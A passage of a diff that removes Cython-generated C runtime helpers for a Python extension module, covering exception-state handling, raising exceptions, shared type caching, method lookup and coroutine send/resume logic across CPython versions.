Py_XINCREF(local_type); - Py_XINCREF(local_value); - *type = local_type; - *value = local_value; - *tb = local_tb; -#if CYTHON_FAST_THREAD_STATE - #if CYTHON_USE_EXC_INFO_STACK - { - _PyErr_StackItem *exc_info = tstate->exc_info; - #if PY_VERSION_HEX >= 0x030B00a4 - tmp_value = exc_info->exc_value; - exc_info->exc_value = local_value; - tmp_type = NULL; - tmp_tb = NULL; - Py_XDECREF(local_type); - Py_XDECREF(local_tb); - #else - tmp_type = exc_info->exc_type; - tmp_value = exc_info->exc_value; - tmp_tb = exc_info->exc_traceback; - exc_info->exc_type = local_type; - exc_info->exc_value = local_value; - exc_info->exc_traceback = local_tb; - #endif - } - #else - tmp_type = tstate->exc_type; - tmp_value = tstate->exc_value; - tmp_tb = tstate->exc_traceback; - tstate->exc_type = local_type; - tstate->exc_value = local_value; - tstate->exc_traceback = local_tb; - #endif - Py_XDECREF(tmp_type); - Py_XDECREF(tmp_value); - Py_XDECREF(tmp_tb); -#else - PyErr_SetExcInfo(local_type, local_value, local_tb); -#endif - return 0; -bad: - *type = 0; - *value = 0; - *tb = 0; - Py_XDECREF(local_type); - Py_XDECREF(local_value); - Py_XDECREF(local_tb); - return -1; -} - -/* pep479 */ -static void __Pyx_Generator_Replace_StopIteration(int in_async_gen) { - PyObject *exc, *val, *tb, *cur_exc; - __Pyx_PyThreadState_declare - #ifdef __Pyx_StopAsyncIteration_USED - int is_async_stopiteration = 0; - #endif - CYTHON_MAYBE_UNUSED_VAR(in_async_gen); - cur_exc = PyErr_Occurred(); - if (likely(!__Pyx_PyErr_GivenExceptionMatches(cur_exc, PyExc_StopIteration))) { - #ifdef __Pyx_StopAsyncIteration_USED - if (in_async_gen && unlikely(__Pyx_PyErr_GivenExceptionMatches(cur_exc, __Pyx_PyExc_StopAsyncIteration))) { - is_async_stopiteration = 1; - } else - #endif - return; - } - __Pyx_PyThreadState_assign - __Pyx_GetException(&exc, &val, &tb); - Py_XDECREF(exc); - Py_XDECREF(val); - Py_XDECREF(tb); - PyErr_SetString(PyExc_RuntimeError, - #ifdef __Pyx_StopAsyncIteration_USED - is_async_stopiteration ? "async generator raised StopAsyncIteration" : - in_async_gen ? "async generator raised StopIteration" : - #endif - "generator raised StopIteration"); -} - -/* FixUpExtensionType */ -#if CYTHON_USE_TYPE_SPECS -static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { -#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API - CYTHON_UNUSED_VAR(spec); - CYTHON_UNUSED_VAR(type); -#else - const PyType_Slot *slot = spec->slots; - while (slot && slot->slot && slot->slot != Py_tp_members) - slot++; - if (slot && slot->slot == Py_tp_members) { - int changed = 0; -#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) - const -#endif - PyMemberDef *memb = (PyMemberDef*) slot->pfunc; - while (memb && memb->name) { - if (memb->name[0] == '_' && memb->name[1] == '_') { -#if PY_VERSION_HEX < 0x030900b1 - if (strcmp(memb->name, "__weaklistoffset__") == 0) { - assert(memb->type == T_PYSSIZET); - assert(memb->flags == READONLY); - type->tp_weaklistoffset = memb->offset; - changed = 1; - } - else if (strcmp(memb->name, "__dictoffset__") == 0) { - assert(memb->type == T_PYSSIZET); - assert(memb->flags == READONLY); - type->tp_dictoffset = memb->offset; - changed = 1; - } -#if CYTHON_METH_FASTCALL - else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { - assert(memb->type == T_PYSSIZET); - assert(memb->flags == READONLY); -#if PY_VERSION_HEX >= 0x030800b4 - type->tp_vectorcall_offset = memb->offset; -#else - type->tp_print = (printfunc) memb->offset; -#endif - changed = 1; - } -#endif -#else - if ((0)); -#endif -#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON - else if (strcmp(memb->name, "__module__") == 0) { - PyObject *descr; - assert(memb->type == T_OBJECT); - assert(memb->flags == 0 || memb->flags == READONLY); - descr = PyDescr_NewMember(type, memb); - if (unlikely(!descr)) - return -1; - if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { - Py_DECREF(descr); - return -1; - } - Py_DECREF(descr); - changed = 1; - } -#endif - } - memb++; - } - if (changed) - PyType_Modified(type); - } -#endif - return 0; -} -#endif - -/* FetchSharedCythonModule */ -static PyObject *__Pyx_FetchSharedCythonABIModule(void) { - PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); - if (unlikely(!abi_module)) return NULL; - Py_INCREF(abi_module); - return abi_module; -} - -/* FetchCommonType */ -static int __Pyx_VerifyCachedType(PyObject *cached_type, - const char *name, - Py_ssize_t basicsize, - Py_ssize_t expected_basicsize) { - if (!PyType_Check(cached_type)) { - PyErr_Format(PyExc_TypeError, - "Shared Cython type %.200s is not a type object", name); - return -1; - } - if (basicsize != expected_basicsize) { - PyErr_Format(PyExc_TypeError, - "Shared Cython type %.200s has the wrong size, try recompiling", - name); - return -1; - } - return 0; -} -#if !CYTHON_USE_TYPE_SPECS -static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { - PyObject* abi_module; - const char* object_name; - PyTypeObject *cached_type = NULL; - abi_module = __Pyx_FetchSharedCythonABIModule(); - if (!abi_module) return NULL; - object_name = strrchr(type->tp_name, '.'); - object_name = object_name ? object_name+1 : type->tp_name; - cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); - if (cached_type) { - if (__Pyx_VerifyCachedType( - (PyObject *)cached_type, - object_name, - cached_type->tp_basicsize, - type->tp_basicsize) < 0) { - goto bad; - } - goto done; - } - if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; - PyErr_Clear(); - if (PyType_Ready(type) < 0) goto bad; - if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) - goto bad; - Py_INCREF(type); - cached_type = type; -done: - Py_DECREF(abi_module); - return cached_type; -bad: - Py_XDECREF(cached_type); - cached_type = NULL; - goto done; -} -#else -static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { - PyObject *abi_module, *cached_type = NULL; - const char* object_name = strrchr(spec->name, '.'); - object_name = object_name ? object_name+1 : spec->name; - abi_module = __Pyx_FetchSharedCythonABIModule(); - if (!abi_module) return NULL; - cached_type = PyObject_GetAttrString(abi_module, object_name); - if (cached_type) { - Py_ssize_t basicsize; -#if CYTHON_COMPILING_IN_LIMITED_API - PyObject *py_basicsize; - py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); - if (unlikely(!py_basicsize)) goto bad; - basicsize = PyLong_AsSsize_t(py_basicsize); - Py_DECREF(py_basicsize); - py_basicsize = 0; - if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; -#else - basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; -#endif - if (__Pyx_VerifyCachedType( - cached_type, - object_name, - basicsize, - spec->basicsize) < 0) { - goto bad; - } - goto done; - } - if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; - PyErr_Clear(); - CYTHON_UNUSED_VAR(module); - cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); - if (unlikely(!cached_type)) goto bad; - if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; - if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; -done: - Py_DECREF(abi_module); - assert(cached_type == NULL || PyType_Check(cached_type)); - return (PyTypeObject *) cached_type; -bad: - Py_XDECREF(cached_type); - cached_type = NULL; - goto done; -} -#endif - -/* RaiseException */ -#if PY_MAJOR_VERSION < 3 -static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { - __Pyx_PyThreadState_declare - CYTHON_UNUSED_VAR(cause); - Py_XINCREF(type); - if (!value || value == Py_None) - value = NULL; - else - Py_INCREF(value); - if (!tb || tb == Py_None) - tb = NULL; - else { - Py_INCREF(tb); - if (!PyTraceBack_Check(tb)) { - PyErr_SetString(PyExc_TypeError, - "raise: arg 3 must be a traceback or None"); - goto raise_error; - } - } - if (PyType_Check(type)) { -#if CYTHON_COMPILING_IN_PYPY - if (!value) { - Py_INCREF(Py_None); - value = Py_None; - } -#endif - PyErr_NormalizeException(&type, &value, &tb); - } else { - if (value) { - PyErr_SetString(PyExc_TypeError, - "instance exception may not have a separate value"); - goto raise_error; - } - value = type; - type = (PyObject*) Py_TYPE(type); - Py_INCREF(type); - if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { - PyErr_SetString(PyExc_TypeError, - "raise: exception class must be a subclass of BaseException"); - goto raise_error; - } - } - __Pyx_PyThreadState_assign - __Pyx_ErrRestore(type, value, tb); - return; -raise_error: - Py_XDECREF(value); - Py_XDECREF(type); - Py_XDECREF(tb); - return; -} -#else -static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { - PyObject* owned_instance = NULL; - if (tb == Py_None) { - tb = 0; - } else if (tb && !PyTraceBack_Check(tb)) { - PyErr_SetString(PyExc_TypeError, - "raise: arg 3 must be a traceback or None"); - goto bad; - } - if (value == Py_None) - value = 0; - if (PyExceptionInstance_Check(type)) { - if (value) { - PyErr_SetString(PyExc_TypeError, - "instance exception may not have a separate value"); - goto bad; - } - value = type; - type = (PyObject*) Py_TYPE(value); - } else if (PyExceptionClass_Check(type)) { - PyObject *instance_class = NULL; - if (value && PyExceptionInstance_Check(value)) { - instance_class = (PyObject*) Py_TYPE(value); - if (instance_class != type) { - int is_subclass = PyObject_IsSubclass(instance_class, type); - if (!is_subclass) { - instance_class = NULL; - } else if (unlikely(is_subclass == -1)) { - goto bad; - } else { - type = instance_class; - } - } - } - if (!instance_class) { - PyObject *args; - if (!value) - args = PyTuple_New(0); - else if (PyTuple_Check(value)) { - Py_INCREF(value); - args = value; - } else - args = PyTuple_Pack(1, value); - if (!args) - goto bad; - owned_instance = PyObject_Call(type, args, NULL); - Py_DECREF(args); - if (!owned_instance) - goto bad; - value = owned_instance; - if (!PyExceptionInstance_Check(value)) { - PyErr_Format(PyExc_TypeError, - "calling %R should have returned an instance of " - "BaseException, not %R", - type, Py_TYPE(value)); - goto bad; - } - } - } else { - PyErr_SetString(PyExc_TypeError, - "raise: exception class must be a subclass of BaseException"); - goto bad; - } - if (cause) { - PyObject *fixed_cause; - if (cause == Py_None) { - fixed_cause = NULL; - } else if (PyExceptionClass_Check(cause)) { - fixed_cause = PyObject_CallObject(cause, NULL); - if (fixed_cause == NULL) - goto bad; - } else if (PyExceptionInstance_Check(cause)) { - fixed_cause = cause; - Py_INCREF(fixed_cause); - } else { - PyErr_SetString(PyExc_TypeError, - "exception causes must derive from " - "BaseException"); - goto bad; - } - PyException_SetCause(value, fixed_cause); - } - PyErr_SetObject(type, value); - if (tb) { - #if PY_VERSION_HEX >= 0x030C00A6 - PyException_SetTraceback(value, tb); - #elif CYTHON_FAST_THREAD_STATE - PyThreadState *tstate = __Pyx_PyThreadState_Current; - PyObject* tmp_tb = tstate->curexc_traceback; - if (tb != tmp_tb) { - Py_INCREF(tb); - tstate->curexc_traceback = tb; - Py_XDECREF(tmp_tb); - } -#else - PyObject *tmp_type, *tmp_value, *tmp_tb; - PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); - Py_INCREF(tb); - PyErr_Restore(tmp_type, tmp_value, tb); - Py_XDECREF(tmp_tb); -#endif - } -bad: - Py_XDECREF(owned_instance); - return; -} -#endif - -/* GetTopmostException */ -#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE -static _PyErr_StackItem * -__Pyx_PyErr_GetTopmostException(PyThreadState *tstate) -{ - _PyErr_StackItem *exc_info = tstate->exc_info; - while ((exc_info->exc_value == NULL || exc_info->exc_value == Py_None) && - exc_info->previous_item != NULL) - { - exc_info = exc_info->previous_item; - } - return exc_info; -} -#endif - -/* SaveResetException */ -#if CYTHON_FAST_THREAD_STATE -static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { - #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 - _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); - PyObject *exc_value = exc_info->exc_value; - if (exc_value == NULL || exc_value == Py_None) { - *value = NULL; - *type = NULL; - *tb = NULL; - } else { - *value = exc_value; - Py_INCREF(*value); - *type = (PyObject*) Py_TYPE(exc_value); - Py_INCREF(*type); - *tb = PyException_GetTraceback(exc_value); - } - #elif CYTHON_USE_EXC_INFO_STACK - _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); - *type = exc_info->exc_type; - *value = exc_info->exc_value; - *tb = exc_info->exc_traceback; - Py_XINCREF(*type); - Py_XINCREF(*value); - Py_XINCREF(*tb); - #else - *type = tstate->exc_type; - *value = tstate->exc_value; - *tb = tstate->exc_traceback; - Py_XINCREF(*type); - Py_XINCREF(*value); - Py_XINCREF(*tb); - #endif -} -static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { - #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 - _PyErr_StackItem *exc_info = tstate->exc_info; - PyObject *tmp_value = exc_info->exc_value; - exc_info->exc_value = value; - Py_XDECREF(tmp_value); - Py_XDECREF(type); - Py_XDECREF(tb); - #else - PyObject *tmp_type, *tmp_value, *tmp_tb; - #if CYTHON_USE_EXC_INFO_STACK - _PyErr_StackItem *exc_info = tstate->exc_info; - tmp_type = exc_info->exc_type; - tmp_value = exc_info->exc_value; - tmp_tb = exc_info->exc_traceback; - exc_info->exc_type = type; - exc_info->exc_value = value; - exc_info->exc_traceback = tb; - #else - tmp_type = tstate->exc_type; - tmp_value = tstate->exc_value; - tmp_tb = tstate->exc_traceback; - tstate->exc_type = type; - tstate->exc_value = value; - tstate->exc_traceback = tb; - #endif - Py_XDECREF(tmp_type); - Py_XDECREF(tmp_value); - Py_XDECREF(tmp_tb); - #endif -} -#endif - -/* SwapException */ -#if CYTHON_FAST_THREAD_STATE -static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { - PyObject *tmp_type, *tmp_value, *tmp_tb; - #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 - _PyErr_StackItem *exc_info = tstate->exc_info; - tmp_value = exc_info->exc_value; - exc_info->exc_value = *value; - if (tmp_value == NULL || tmp_value == Py_None) { - Py_XDECREF(tmp_value); - tmp_value = NULL; - tmp_type = NULL; - tmp_tb = NULL; - } else { - tmp_type = (PyObject*) Py_TYPE(tmp_value); - Py_INCREF(tmp_type); - #if CYTHON_COMPILING_IN_CPYTHON - tmp_tb = ((PyBaseExceptionObject*) tmp_value)->traceback; - Py_XINCREF(tmp_tb); - #else - tmp_tb = PyException_GetTraceback(tmp_value); - #endif - } - #elif CYTHON_USE_EXC_INFO_STACK - _PyErr_StackItem *exc_info = tstate->exc_info; - tmp_type = exc_info->exc_type; - tmp_value = exc_info->exc_value; - tmp_tb = exc_info->exc_traceback; - exc_info->exc_type = *type; - exc_info->exc_value = *value; - exc_info->exc_traceback = *tb; - #else - tmp_type = tstate->exc_type; - tmp_value = tstate->exc_value; - tmp_tb = tstate->exc_traceback; - tstate->exc_type = *type; - tstate->exc_value = *value; - tstate->exc_traceback = *tb; - #endif - *type = tmp_type; - *value = tmp_value; - *tb = tmp_tb; -} -#else -static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb) { - PyObject *tmp_type, *tmp_value, *tmp_tb; - PyErr_GetExcInfo(&tmp_type, &tmp_value, &tmp_tb); - PyErr_SetExcInfo(*type, *value, *tb); - *type = tmp_type; - *value = tmp_value; - *tb = tmp_tb; -} -#endif - -/* PyObjectCall2Args */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2) { - PyObject *args[3] = {NULL, arg1, arg2}; - return __Pyx_PyObject_FastCall(function, args+1, 2 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); -} - -/* PyObjectGetMethod */ -static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { - PyObject *attr; -#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP - __Pyx_TypeName type_name; - PyTypeObject *tp = Py_TYPE(obj); - PyObject *descr; - descrgetfunc f = NULL; - PyObject **dictptr, *dict; - int meth_found = 0; - assert (*method == NULL); - if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { - attr = __Pyx_PyObject_GetAttrStr(obj, name); - goto try_unpack; - } - if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { - return 0; - } - descr = _PyType_Lookup(tp, name); - if (likely(descr != NULL)) { - Py_INCREF(descr); -#if defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR - if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) -#elif PY_MAJOR_VERSION >= 3 - #ifdef __Pyx_CyFunction_USED - if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) - #else - if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) - #endif -#else - #ifdef __Pyx_CyFunction_USED - if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) - #else - if (likely(PyFunction_Check(descr))) - #endif -#endif - { - meth_found = 1; - } else { - f = Py_TYPE(descr)->tp_descr_get; - if (f != NULL && PyDescr_IsData(descr)) { - attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); - Py_DECREF(descr); - goto try_unpack; - } - } - } - dictptr = _PyObject_GetDictPtr(obj); - if (dictptr != NULL && (dict = *dictptr) != NULL) { - Py_INCREF(dict); - attr = __Pyx_PyDict_GetItemStr(dict, name); - if (attr != NULL) { - Py_INCREF(attr); - Py_DECREF(dict); - Py_XDECREF(descr); - goto try_unpack; - } - Py_DECREF(dict); - } - if (meth_found) { - *method = descr; - return 1; - } - if (f != NULL) { - attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); - Py_DECREF(descr); - goto try_unpack; - } - if (likely(descr != NULL)) { - *method = descr; - return 0; - } - type_name = __Pyx_PyType_GetName(tp); - PyErr_Format(PyExc_AttributeError, -#if PY_MAJOR_VERSION >= 3 - "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", - type_name, name); -#else - "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", - type_name, PyString_AS_STRING(name)); -#endif - __Pyx_DECREF_TypeName(type_name); - return 0; -#else - attr = __Pyx_PyObject_GetAttrStr(obj, name); - goto try_unpack; -#endif -try_unpack: -#if CYTHON_UNPACK_METHODS - if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { - PyObject *function = PyMethod_GET_FUNCTION(attr); - Py_INCREF(function); - Py_DECREF(attr); - *method = function; - return 1; - } -#endif - *method = attr; - return 0; -} - -/* PyObjectCallMethod1 */ -static PyObject* __Pyx__PyObject_CallMethod1(PyObject* method, PyObject* arg) { - PyObject *result = __Pyx_PyObject_CallOneArg(method, arg); - Py_DECREF(method); - return result; -} -static PyObject* __Pyx_PyObject_CallMethod1(PyObject* obj, PyObject* method_name, PyObject* arg) { - PyObject *method = NULL, *result; - int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); - if (likely(is_method)) { - result = __Pyx_PyObject_Call2Args(method, obj, arg); - Py_DECREF(method); - return result; - } - if (unlikely(!method)) return NULL; - return __Pyx__PyObject_CallMethod1(method, arg); -} - -/* PyObjectCallNoArg */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { - PyObject *arg[2] = {NULL, NULL}; - return __Pyx_PyObject_FastCall(func, arg + 1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); -} - -/* CoroutineBase */ -#include -#if PY_VERSION_HEX >= 0x030b00a6 - #ifndef Py_BUILD_CORE - #define Py_BUILD_CORE 1 - #endif - #include "internal/pycore_frame.h" -#endif -#define __Pyx_Coroutine_Undelegate(gen) Py_CLEAR((gen)->yieldfrom) -static int __Pyx_PyGen__FetchStopIterationValue(PyThreadState *__pyx_tstate, PyObject **pvalue) { - PyObject *et, *ev, *tb; - PyObject *value = NULL; - CYTHON_UNUSED_VAR(__pyx_tstate); - __Pyx_ErrFetch(&et, &ev, &tb); - if (!et) { - Py_XDECREF(tb); - Py_XDECREF(ev); - Py_INCREF(Py_None); - *pvalue = Py_None; - return 0; - } - if (likely(et == PyExc_StopIteration)) { - if (!ev) { - Py_INCREF(Py_None); - value = Py_None; - } -#if PY_VERSION_HEX >= 0x030300A0 - else if (likely(__Pyx_IS_TYPE(ev, (PyTypeObject*)PyExc_StopIteration))) { - value = ((PyStopIterationObject *)ev)->value; - Py_INCREF(value); - Py_DECREF(ev); - } -#endif - else if (unlikely(PyTuple_Check(ev))) { - if (PyTuple_GET_SIZE(ev) >= 1) { -#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - value = PyTuple_GET_ITEM(ev, 0); - Py_INCREF(value); -#else - value = PySequence_ITEM(ev, 0); -#endif - } else { - Py_INCREF(Py_None); - value = Py_None; - } - Py_DECREF(ev); - } - else if (!__Pyx_TypeCheck(ev, (PyTypeObject*)PyExc_StopIteration)) { - value = ev; - } - if (likely(value)) { - Py_XDECREF(tb); - Py_DECREF(et); - *pvalue = value; - return 0; - } - } else if (!__Pyx_PyErr_GivenExceptionMatches(et, PyExc_StopIteration)) { - __Pyx_ErrRestore(et, ev, tb); - return -1; - } - PyErr_NormalizeException(&et, &ev, &tb); - if (unlikely(!PyObject_TypeCheck(ev, (PyTypeObject*)PyExc_StopIteration))) { - __Pyx_ErrRestore(et, ev, tb); - return -1; - } - Py_XDECREF(tb); - Py_DECREF(et); -#if PY_VERSION_HEX >= 0x030300A0 - value = ((PyStopIterationObject *)ev)->value; - Py_INCREF(value); - Py_DECREF(ev); -#else - { - PyObject* args = __Pyx_PyObject_GetAttrStr(ev, __pyx_n_s_args); - Py_DECREF(ev); - if (likely(args)) { - value = PySequence_GetItem(args, 0); - Py_DECREF(args); - } - if (unlikely(!value)) { - __Pyx_ErrRestore(NULL, NULL, NULL); - Py_INCREF(Py_None); - value = Py_None; - } - } -#endif - *pvalue = value; - return 0; -} -static CYTHON_INLINE -void __Pyx_Coroutine_ExceptionClear(__Pyx_ExcInfoStruct *exc_state) { -#if PY_VERSION_HEX >= 0x030B00a4 - Py_CLEAR(exc_state->exc_value); -#else - PyObject *t, *v, *tb; - t = exc_state->exc_type; - v = exc_state->exc_value; - tb = exc_state->exc_traceback; - exc_state->exc_type = NULL; - exc_state->exc_value = NULL; - exc_state->exc_traceback = NULL; - Py_XDECREF(t); - Py_XDECREF(v); - Py_XDECREF(tb); -#endif -} -#define __Pyx_Coroutine_AlreadyRunningError(gen) (__Pyx__Coroutine_AlreadyRunningError(gen), (PyObject*)NULL) -static void __Pyx__Coroutine_AlreadyRunningError(__pyx_CoroutineObject *gen) { - const char *msg; - CYTHON_MAYBE_UNUSED_VAR(gen); - if ((0)) { - #ifdef __Pyx_Coroutine_USED - } else if (__Pyx_Coroutine_Check((PyObject*)gen)) { - msg = "coroutine already executing"; - #endif - #ifdef __Pyx_AsyncGen_USED - } else if (__Pyx_AsyncGen_CheckExact((PyObject*)gen)) { - msg = "async generator already executing"; - #endif - } else { - msg = "generator already executing"; - } - PyErr_SetString(PyExc_ValueError, msg); -} -#define __Pyx_Coroutine_NotStartedError(gen) (__Pyx__Coroutine_NotStartedError(gen), (PyObject*)NULL) -static void __Pyx__Coroutine_NotStartedError(PyObject *gen) { - const char *msg; - CYTHON_MAYBE_UNUSED_VAR(gen); - if ((0)) { - #ifdef __Pyx_Coroutine_USED - } else if (__Pyx_Coroutine_Check(gen)) { - msg = "can't send non-None value to a just-started coroutine"; - #endif - #ifdef __Pyx_AsyncGen_USED - } else if (__Pyx_AsyncGen_CheckExact(gen)) { - msg = "can't send non-None value to a just-started async generator"; - #endif - } else { - msg = "can't send non-None value to a just-started generator"; - } - PyErr_SetString(PyExc_TypeError, msg); -} -#define __Pyx_Coroutine_AlreadyTerminatedError(gen, value, closing) (__Pyx__Coroutine_AlreadyTerminatedError(gen, value, closing), (PyObject*)NULL) -static void __Pyx__Coroutine_AlreadyTerminatedError(PyObject *gen, PyObject *value, int closing) { - CYTHON_MAYBE_UNUSED_VAR(gen); - CYTHON_MAYBE_UNUSED_VAR(closing); - #ifdef __Pyx_Coroutine_USED - if (!closing && __Pyx_Coroutine_Check(gen)) { - PyErr_SetString(PyExc_RuntimeError, "cannot reuse already awaited coroutine"); - } else - #endif - if (value) { - #ifdef __Pyx_AsyncGen_USED - if (__Pyx_AsyncGen_CheckExact(gen)) - PyErr_SetNone(__Pyx_PyExc_StopAsyncIteration); - else - #endif - PyErr_SetNone(PyExc_StopIteration); - } -} -static -PyObject *__Pyx_Coroutine_SendEx(__pyx_CoroutineObject *self, PyObject *value, int closing) { - __Pyx_PyThreadState_declare - PyThreadState *tstate; - __Pyx_ExcInfoStruct *exc_state; - PyObject *retval; - assert(!self->is_running); - if (unlikely(self->resume_label == 0)) { - if (unlikely(value && value != Py_None)) { - return __Pyx_Coroutine_NotStartedError((PyObject*)self); - } - } - if (unlikely(self->resume_label == -1)) { - return __Pyx_Coroutine_AlreadyTerminatedError((PyObject*)self, value, closing); - } -#if CYTHON_FAST_THREAD_STATE - __Pyx_PyThreadState_assign - tstate = __pyx_tstate; -#else - tstate = __Pyx_PyThreadState_Current; -#endif - exc_state = &self->gi_exc_state; - if (exc_state->exc_value) { - #if CYTHON_COMPILING_IN_PYPY - #else - PyObject *exc_tb; - #if PY_VERSION_HEX >= 0x030B00a4 && !CYTHON_COMPILING_IN_CPYTHON - exc_tb = PyException_GetTraceback(exc_state->exc_value); - #elif PY_VERSION_HEX >= 0x030B00a4 - exc_tb = ((PyBaseExceptionObject*) exc_state->exc_value)->traceback; - #else - exc_tb = exc_state->exc_traceback; - #endif - if (exc_tb) { - PyTracebackObject *tb = (PyTracebackObject *) exc_tb; - PyFrameObject *f = tb->tb_frame; - assert(f->f_back == NULL); - #if PY_VERSION_HEX >= 0x030B00A1 - f->f_back = PyThreadState_GetFrame(tstate); - #else - Py_XINCREF(tstate->frame); - f->f_back = tstate->frame; - #endif - #if PY_VERSION_HEX >= 0x030B00a4 && !CYTHON_COMPILING_IN_CPYTHON - Py_DECREF(exc_tb); - #endif - } - #endif - } -#if CYTHON_USE_EXC_INFO_STACK - exc_state->previous_item = tstate->exc_info; - tstate->exc_info = exc_state; -#else - if (exc_state->exc_type) { - __Pyx_ExceptionSwap(&exc_state->exc_type, &exc_state->exc_value, &exc_state->exc_traceback); - } else { - __Pyx_Coroutine_ExceptionClear(exc_state); - __Pyx_ExceptionSave(&exc_state->exc_type, &exc_state->exc_value, &exc_state->exc_traceback); - } -#endif - self->is_running = 1; - retval = self->body(self, tstate, value); - self->is_running = 0; -#if CYTHON_USE_EXC_INFO_STACK - exc_state = &self->gi_exc_state; - tstate->exc_info = exc_state->previous_item; - exc_state->previous_item = NULL; - __Pyx_Coroutine_ResetFrameBackpointer(exc_state); -#endif - return retval; -} -static CYTHON_INLINE void __Pyx_Coroutine_ResetFrameBackpointer(__Pyx_ExcInfoStruct *exc_state) { -#if CYTHON_COMPILING_IN_PYPY - CYTHON_UNUSED_VAR(exc_state); -#else - PyObject *exc_tb; - #if PY_VERSION_HEX >= 0x030B00a4 - if (!exc_state->exc_value) return; - exc_tb = PyException_GetTraceback(exc_state->exc_value); - #else - exc_tb = exc_state->exc_traceback; - #endif - if (likely(exc_tb)) { - PyTracebackObject *tb = (PyTracebackObject *) exc_tb; - PyFrameObject *f = tb->tb_frame; - Py_CLEAR(f->f_back); - #if PY_VERSION_HEX >= 0x030B00a4 - Py_DECREF(exc_tb); - #endif - } -#endif -} -static CYTHON_INLINE -PyObject *__Pyx_Coroutine_MethodReturn(PyObject* gen, PyObject *retval) { - CYTHON_MAYBE_UNUSED_VAR(gen); - if (unlikely(!retval)) { - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - if (!__Pyx_PyErr_Occurred()) { - PyObject *exc = PyExc_StopIteration; - #ifdef __Pyx_AsyncGen_USED - if (__Pyx_AsyncGen_CheckExact(gen)) - exc = __Pyx_PyExc_StopAsyncIteration; - #endif - __Pyx_PyErr_SetNone(exc); - } - } - return retval; -} -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03030000 && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) -static CYTHON_INLINE -PyObject *__Pyx_PyGen_Send(PyGenObject *gen, PyObject *arg) { -#if PY_VERSION_HEX <= 0x030A00A1 - return _PyGen_Send(gen, arg); -#else - PyObject *result; - if (PyIter_Send((PyObject*)gen, arg ? arg : Py_None, &result) == PYGEN_RETURN) { - if (PyAsyncGen_CheckExact(gen)) { - assert(result == Py_None); - PyErr_SetNone(PyExc_StopAsyncIteration); - } - else if (result == Py_None) { - PyErr_SetNone(PyExc_StopIteration); - } - else { - _PyGen_SetStopIterationValue(result); - } - 